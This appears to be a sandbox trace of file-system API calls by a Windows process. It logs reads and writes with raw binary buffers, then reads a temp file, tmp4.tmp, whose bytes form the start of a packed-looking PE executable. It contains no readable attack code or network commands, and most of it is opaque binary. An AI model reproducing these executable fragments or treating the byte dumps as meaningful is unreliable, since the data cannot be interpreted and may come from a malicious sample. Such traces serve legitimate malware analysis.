\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtWriteFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtReadFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtWriteFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtReadFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtWriteFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtReadFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtWriteFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtWriteFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,905 | 1600 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtQueryInformationFile |
FileHandle => 0x000001dc FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\xc0p\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:02,905 | 1600 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,915 | 1600 | NtReadFile |
